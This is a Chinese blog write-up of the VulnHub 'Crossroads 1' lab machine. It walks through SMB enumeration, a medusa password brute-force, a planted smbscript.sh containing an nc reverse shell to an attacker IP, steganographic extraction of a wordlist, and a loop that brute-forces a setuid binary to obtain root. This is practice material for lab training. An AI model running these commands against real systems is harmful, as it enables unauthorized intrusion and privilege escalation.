CROSSROADS1靶机复盘

CROSSROADS1靶机复盘

这个靶机学会了三个工具enum4linux,smbclient,stegoveritas。枚举服务器可能开启的一些资源,smb扫描工具,还有一个隐写术的工具。

靶场下载地址:https://download.vulnhub.com/crossroads/crossroads_vh.ova

扫描到ip后对ip进行一个全面的扫描,发现这个靶机开启了smb服务,可以把这个服务比喻成文件共享服务。

image-20230713211942620

同时我们扫描一下ip地址,发现一个robots.txt文件

dirsearch -u http://192.168.102.171

image-20230714141052001

image-20230714141433801

enum4linux 工具可以枚举目标主机的网络配置、用户和组信息以及共享资源。

enum4linux 192.168.102.171

我们发现了一个用户名,但是smbclient查看还需要密码。

image-20230713214137922

使用美杜莎爆破一下smb服务的密码,hydra爆破很慢。

medusa  -d  查看可以爆破的服务,是有smb服务的。
medusa  -u  albert -P /usr/share/wordlist/rockyou.txt -M smbnt -h 192.168.102.171 -t 10

User: albert Password: bradley1

image-20230713214449171

smbclient //192.168.102.171/smbshare -U albert    #列出SMB服务器上的共享资源。

输入密码登录上。

发现只有一个文件,我们get到我们本机上,这是smb的配置文件。

image-20230713215449417

我们发现配置文件里面显示SMB会执行的一个脚本,但是smb里面又没有这个脚本,所以我们可以自己创建一个这样的脚本,然后上传到smb上面来。

image-20230713220453639

我在smbscript.sh中写了一个反弹shell脚本nc -e /bin/bash 192.168.102.129 8888

这样当put这个脚本到smb时候会自动执行一个反弹shell。

image-20230713220437819

我们接收就上来了,在上一层目录发现又一个同样的图片文件。

image-20230713220901366

ls -lh发现文件大小比我们刚才下载的要大了很多,猜测这个图片里面可能藏了东西,先把这个文件传到我们的kali上。

image-20230713220946818

find查找一下有root权限的文件,发现beroot文件时rws文件,执行后就可以获取root权限,但是执行后需要输入密码。

image-20230713221441920

image-20230713221511583

我们就想到了刚才跟靶机中拷贝到我们自己电脑上的图片文件,经过尝试,这个图片是利用stegoveritas 把数据隐写进去的,首先我们安装stegoveritas工具,需要用到python。

image-20230714092047728

image-20230714091733344

安装好后直接执行以下代码就可以取出里面隐写的内容,是保存到当前目录results目录中。

stegoveritas crossroads.png 

image-20230714092305437

这里我们发现很多文件,挨个file以下,发现有一个text文件,查看了以下发现是个密码字典,我们把这个密码字典拷贝走。

image-20230714092621563

密码密码复制到/root目录下,起个新名字叫pass.txt,因为还有个文件和这个文件内容一样就查看了一下,发现只有这一个密码字典可以用。

diff 文件名 文件名 #如果没有任何区别,就代表两个文件一样

把pass.txt复制到靶机上,爆破一下beroot文件,,利用一下代码可以批量爆破。

for i in `cat pass.txt`;do echo $i >> tmp;echo $i|./beroot >> tmp ;done

image-20230714094816783

执行结束后我们ls下发现多了一个文件,就是rootcreds文件,cat一下发现是一个root账户密码。

image-20230714094934425

su root顺利提权成功。

image-20230714095026651

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值